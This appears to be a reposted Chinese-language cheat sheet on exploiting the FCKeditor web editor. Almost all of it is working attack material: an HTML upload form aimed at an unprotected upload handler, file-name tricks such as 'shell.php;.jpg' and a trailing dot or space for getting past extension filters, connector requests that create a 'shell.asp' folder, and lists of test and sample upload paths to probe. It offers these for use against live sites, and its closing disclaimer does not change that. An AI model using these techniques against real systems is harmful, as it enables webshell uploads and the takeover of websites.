Fckeditor漏洞利用总结 本文关键词:漏洞,利用,Fckeditor
Fckeditor漏洞利用总结 本文简介:Fckeditor漏洞利用总结查看编辑器版本fckeditor/_whatsnew.html—————————————————————————————————————————————————————————————2.version2.2版本apache+linux环境下在上传文件后面加个.突破!测
Fckeditor漏洞利用总结 本文内容:
Fckeditor漏洞利用总结
查看编辑器版本
fckeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2.
version
2.2
版本
apache+linux
环境下在上传文件后面加个.突破!测试通过。
—————————————————————————————————————————————————————————————
3.version
=2.4.2
for
php
在处理php
上传的地方并未对media
类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
form
id=“frmupload“enctype=“multipart/form-data“action=“site/fckeditor/editor/filemanager/upload/php/upload.php?type=media“method=“post“upload
a
new
file:br
input
type=“file“name=“newfile“size=“50“br
input
id=“btnupload“type=“submit“value=“upload“/form
—————————————————————————————————————————————————————————————
4.fckeditor
文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar
或shell.php;.jpg
会变为shell_php;.jpg
这是新版fck
的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win
系统
*nix
是不支持的[shell.php
和shell.php+空格是2
个不同的文件
未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg
也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————
5.
突破建立文件夹
fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfoldertype=imagecurrentfolder=%2fshell.aspnewfoldername=zuuid=1244789975684
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=createfoldercurrentfolder=/type=imagenewfoldername=shell.asp
—————————————————————————————————————————————————————————————
6.
fckeditor
中test
文件的上传地址
fckeditor/editor/filemanager/browser/default/connectors/test.html
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/connectors/test.html
fckeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=getfoldersandfilestype=imagecurrentfolder=/
fckeditor/editor/filemanager/browser/default/browser.html?type=imageconnector=connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/default/browser.html?type=imageconnector=site%2ffckeditor%2feditor%2ffilemanager%2fconnectors%2fphp%2fconnector.php
(ver:2.6.3
测试通过)
jsp
版:
fckeditor/editor/filemanager/browser/default/browser.html?type=imageconnector=connectors/jsp/connector.jsp
注意红色部分修改为fckeditor
实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用/目录遍历,紫色部分为实际网站地址。
—————————————————————————————————————————————————————————————
8.其他上传地址
fckeditor/_samples/default.html
fckeditor/_samples/asp/sample01.asp
fckeditor/_samples/asp/sample02.asp
fckeditor/_samples/asp/sample03.asp
fckeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples
目录,可以试试。
fckeditor/editor/fckeditor.html
不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
Fckeditor漏洞利用总结 来源:网络整理
免责声明:本文仅限学习分享,如产生版权问题,请联系我们及时删除。